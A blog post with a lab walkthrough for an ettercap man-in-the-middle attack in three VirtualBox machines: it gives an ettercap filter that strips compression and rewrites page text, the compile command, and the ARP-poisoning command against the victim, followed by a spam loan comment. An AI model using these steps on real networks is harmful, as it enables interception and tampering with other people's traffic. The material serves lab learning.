Friday, December 27, 2019

ettercap http replace man-in-the-middle full example

create 3 vms in virtualbox

1.) kali linux ATTACKER
      will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
       will be hosting the website the victim wants to access
3.) windows VICTIM
       will be the victim trying to access the web server


steps
-------
1.) setup all 3 virtualbox Network tab to use "Internal Network" and the same name
2.) power up all 3
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux WEB SERVER to similar ip address as windows
       ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) configure kali linux ATTACKER to similar ip address as windows
       ifconfig eth0 169.254.18.3 netmask 255.255.0.0 up
6.) ping each other system from within each virtual machine to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
      then launch python simple http server on port 8001
             python -m SimpleHTTPServer 8001
8.) on windows VICTIM open microsoft edge and navigate to website
       http://169.254.18.2:8001/
     you will see the text
        "this is fun"

             

9.) on kali linux ATTACKER
      create an ettercap filter file with a text editor with this content and save as "fun.filter"
          if (ip.proto == TCP) {
           if (tcp.dst == 8001 || tcp.src == 8001) {
             if (search(DATA.data, "Accept-Encoding")) {
              replace("Accept-Encoding", "Accept-Nothing!");
              msg("removed encoding");
            }
            if (search(DATA.data, "fun")) {
             replace("fun", "evil");
             msg("fun is now evil");
            }
           }
          }
   
     NOTE: above the accept-encoding removal is important otherwise the html is gzip encoded and not clear text so your replace won't work and the src/dst port is important so you catch request and response

     next compile the filter
         etterfilter fun.filter -o fun.ef
     next run ettercap using the filter and arp spoofing
         ettercap -tq -M arp:remote -F fun.ef /169.254.18.1-3// /169.254.18.1-3//
10.) on windows VICTIM
       reload the website
         http://169.254.18.2:8001/
       you will now see the text
         "this is evil"




11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit
Posted by at
Labels: , ,

1 comment:

  1. UnknownMay 1, 2021 at 11:04 AM

    Are you in need of finance? we give out guarantee cash at 3% interest rate. Contact us on any kind of finance now: financialserviceoffer876@gmail.com whatsapp Number +918929509036 Dr James Eric Finance Pvt Ltd

    ReplyDelete

Subscribe to: Post Comments (Atom)